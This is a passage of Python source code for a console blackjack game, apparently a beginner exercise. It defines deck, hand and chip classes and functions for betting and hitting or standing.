__str__(self):\r\n return self.rank + ' of ' + self.suit\r\n#Deck class\r\nclass Deck:\r\n \r\n def __init__(self):\r\n self.deck = [] # start with an empty list\r\n for suit in suits:\r\n for rank in ranks:\r\n self.deck.append(Card(suit,rank))\r\n \r\n \r\n \r\n\r\n def shuffle(self):\r\n random.shuffle(self.deck)\r\n \r\n def deal(self):\r\n return self.deck.pop()\r\n#Hand class\r\nclass Hand:\r\n def __init__(self):\r\n self.cards = [] # start with an empty list as we did in the Deck class\r\n self.value = 0 # start with zero value\r\n self.aces = 0 # add an attribute to keep track of aces\r\n \r\n def add_card(self,card):\r\n self.cards.append(card)\r\n self.value=values[card.rank]+self.value\r\n if card.rank=='Ace':\r\n self.aces+=1\r\n \r\n \r\n def adjust_for_ace(self):\r\n if self.value>21 and self.aces!=0:\r\n self.value-=10\r\n self.aces-=1\r\n#Chips class\r\nclass Chips:\r\n \r\n def __init__(self):\r\n self.total = 100 # This can be set to a default value or supplied by a user input\r\n self.bet = 0\r\n \r\n def win_bet(self):\r\n self.total+=self.bet\r\n \r\n \r\n def lose_bet(self):\r\n self.total-=self.bet\r\n#Function Defintions\r\n#Function for taking bets\r\ndef take_bet(Chips):\r\n while True:\r\n try :\r\n bet=int(input('please make a bet: '))\r\n if bet<=Chips.total:\r\n return bet\r\n \r\n else:\r\n print('you dont have enough chips')\r\n except:\r\n print('wrong input please enter a number')\r\n#Function for taking hits\r\ndef hit(deck,hand):\r\n hand.add_card(deck.deal())\r\n hand.adjust_for_ace()\r\n#Function prompting the Player to Hit or Stand\r\ndef hit_or_stand(deck,hand):\r\n global playing # to control an upcoming while loop\r\n choise='w'\r\n while choise not in ['H','S']:\r\n choise=input('do you want to Hit or Stand(H or S): ')\r\n if choise not in ['H','S']:\r\n print('wrong input ')\r\n elif choise=='H':\r\n hit(deck,hand)\r\n elif choise=='S':\r\n playing=False\r\n#Functions to display cards\r\ndef show_some(player,dealer):\r\n print(\"\\nDealer's Hand:\")\r\n print(\"